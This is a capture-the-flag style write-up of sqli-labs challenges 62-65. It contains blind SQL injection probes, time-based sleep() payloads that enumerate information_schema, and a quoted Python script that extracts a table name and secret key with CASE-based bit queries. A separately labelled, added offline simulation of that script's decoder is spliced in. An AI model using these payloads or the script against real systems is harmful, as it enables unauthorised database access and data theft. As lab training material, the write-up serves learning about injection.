sqli-labs (62-65) challenges - blind injection
62 Get the flag within 130 steps - time-based blind injection
130 steps! That's underestimating me a bit (smirk)
1. ?id=2 and 1=2
Displayed, so the parameter is not a plain numeric type
2. ?id=2'
Not displayed
3. ?id=2' and '1'='1
Displays the row for id 1, which means the input is wrapped in parentheses and single quotes (the whole parenthesised expression evaluates to 1, so the query becomes id=(1)).
Blind injection:
- the table name is 10 random letters and digits
- the column name is secret_ plus four random letters or digits
- the password is 24 random letters and digits
In the worst case, plain blind injection needs (10+4+24)*34 = 1292 requests, but the flag has to be obtained within 130 steps, so brute-force guessing with Burp Suite is out of the question.
With manual binary search the worst case drops to (10+4+24)*5 = 190 requests.
If a nested query is used, the table name does not need to be fetched at all; combined with binary search the worst case is (4+24)*5 = 140 requests.
Manual injection
Getting the table name
?id=1' and if(substr((select char_length(concat(0x5c, (select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c))),1,1)='1', sleep(3),null)--+
Or use the statements below to narrow the range:
?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)>'o', sleep(3),null)--+
?id=1' and if(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),2,1)>'m', sleep(3),null)--+
After a few attempts the table name is obtained.
Without guessing the table name, use a nested query:
select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=(select group_concat(table_name) from information_schema.tables where table_schema=database());
Script
Reference: "sqli-labs靶場Less-62題解(少於130次)" (sqli-labs Less-62 writeup in under 130 requests) on 簡書 (jianshu.com)
I'm a noob who can't write scripts yet, so I grabbed one off the internet.
All I can say is that the author is really good, pulling it off in 60-something requests.
#!/usr/bin/python3
# -*-coding:utf-8-*-
import re
import requests

url = "http://www.test.com/sqli-labs-master/Less-62/index.php"  # change to your own address
try_count = 0


def extract_bits(query, i, bit_values: list):
    """
    Get 3 bits of the i-th (1-based) character of the result of query.
    Which 3 bits are read is given by bit_values.
    """
    global try_count
    assert len(bit_values) == 8
    bit_marks = 0
    for v in bit_values:
        bit_marks |= v
    # The CASE maps (ascii & mask) onto one of the 8 user ids, so the login name
    # shown on the page tells us which of the 8 listed values matched.
    payload = """
    '+(
    SELECT CASE ASCII(SUBSTRING(({query}), {i}, 1)) & ({bit_mark})
    WHEN {0} THEN 1
    WHEN {1} THEN 2
    WHEN {2} THEN 3
    WHEN {3} THEN 4
    WHEN {4} THEN 5
    WHEN {5} THEN 6
    WHEN {6} THEN 7
    ELSE 8
    END
    )+'
    """.format(*bit_values[:7], query=query, bit_mark=bit_marks, i=i)
    payload = re.sub(r'\s+', ' ', payload.strip().replace("\n", " "))
    # print(payload)
    resp = requests.get(url, params={"id": payload})
    try_count += 1
    infos = ["Angelina", "Dummy", "secure", "stupid", "superman", "batman", "admin", "admin1"]
    match = re.search(r"Your Login name : (.*?)<br>", resp.text)
    assert match
    assert match.group(1) in infos
    bits = bit_values[infos.index(match.group(1))]
    return bits


def extract_data(query, length):
    """
    Fetch length characters of the result of query; for each character only the
    7th bit (1-based) and the low 5 bits are read, so 2 requests per character.
    """
    res = ""
    for i in range(1, length + 1):
        b2 = extract_bits(query, i, [0b00000000, 0b00000001, 0b00000010, 0b00000011, 0b00000100, 0b00000101, 0b00000110, 0b00000111])  # 00000111
        b1 = extract_bits(query, i, [0b00000000, 0b00001000, 0b00010000, 0b00011000, 0b01000000, 0b01001000, 0b01010000, 0b01011000])  # 01011000
        if b1 & 0b01000000 == 0:
            # this character is a digit
            bit = b1 | b2 | 0b00100000
        else:
            # this character is a letter
            bit = b1 | b2
        res += chr(bit)
    return res


if __name__ == "__main__":
    table_name = extract_data("select table_name from information_schema.TABLES where TABLE_SCHEMA='challenges' limit 1", 10)
    print("table_name:", table_name)
    secret_key = extract_data("select c from (select 1 as a, 2 as b, 3 as c, 4 as d union select * from challenges.%s limit 1,1)x" % table_name, 24)
    print("secret_key:", secret_key)
    print("Done. try_count:", try_count)
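Added example, not part of the post or of the Jianshu script quoted above: an offline model of how extract_data recovers one character from two 8-way CASE lookups (3 bits each), showing why a 10+24 character result costs 68 requests and why lowercase letters come back as uppercase (bit 5 is never read). The CASE is simulated locally; the names simulated_case, decode_char, lossy_chars and request_budget are mine.

```python
# Added example (not from the post or the Jianshu script it quotes): an offline
# model of the decoder in extract_data; the CASE is simulated locally.
LOW_BITS = [0b000, 0b001, 0b010, 0b011, 0b100, 0b101, 0b110, 0b111]
HIGH_BITS = [0b00000000, 0b00001000, 0b00010000, 0b00011000,
             0b01000000, 0b01001000, 0b01010000, 0b01011000]
# login names of user rows 1..8, in id order, as listed in the script
INFOS = ["Angelina", "Dummy", "secure", "stupid", "superman", "batman", "admin", "admin1"]


def simulated_case(ch: str, bit_values: list) -> str:
    """Model of `CASE ASCII(c) & mask WHEN v1 THEN 1 ... ELSE 8 END`:
    return the login name of the user row the CASE would select."""
    mask = 0
    for v in bit_values:
        mask |= v
    masked = ord(ch) & mask
    for row, v in enumerate(bit_values[:7], start=1):
        if masked == v:
            return INFOS[row - 1]
    return INFOS[7]  # ELSE 8


def decode_char(ch: str) -> tuple:
    """Recover ch exactly as extract_data does, from two 3-bit lookups.
    Returns (recovered character, number of lookups used)."""
    b2 = LOW_BITS[INFOS.index(simulated_case(ch, LOW_BITS))]    # bits 0-2
    b1 = HIGH_BITS[INFOS.index(simulated_case(ch, HIGH_BITS))]  # bits 3, 4, 6
    if b1 & 0b01000000 == 0:
        code = b1 | b2 | 0b00100000  # digit: bit 5 is always set in 0x30-0x39
    else:
        code = b1 | b2               # letter: bit 5 (the case bit) was never read
    return chr(code), 2


def lossy_chars(alphabet: str) -> str:
    """Characters of alphabet that do not survive the 6-bit round trip."""
    return "".join(c for c in alphabet if decode_char(c)[0] != c)


def request_budget(table_len: int, secret_len: int) -> int:
    """Lookups for a table name plus a secret at 2 per character."""
    return 2 * (table_len + secret_len)


if __name__ == "__main__":
    import string
    print(decode_char("7"), decode_char("K"), decode_char("k"))
    print("not recovered exactly:", lossy_chars(string.ascii_letters + string.digits))
    print("requests for 10 + 24 chars:", request_budget(10, 24))
```

Digits and uppercase letters round-trip exactly; every lowercase letter is folded to its uppercase form, which is why the script gets away with 6 bits per character.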
63 Within 130 steps - single quote - time-based injection
id=2 and 1=2
Displayed
id=2'
Not displayed
id=2' and '1'='1
Displays the row for id 2: single-quoted string type
Injection skipped
64 Within 130 steps - numeric - double parentheses
id=2 and 1=2
Not displayed
id=2)--+
Not displayed
id=2))--+
Displayed: numeric type, double parentheses
Injection skipped
65 Within 130 steps - double quotes - double parentheses
id=2 and 1=2
Displayed
id=2'
Displayed
id=2"
Not displayed
id=2" and "1"="1
Displays the row for id 1: double quotes, double parentheses
Injection skipped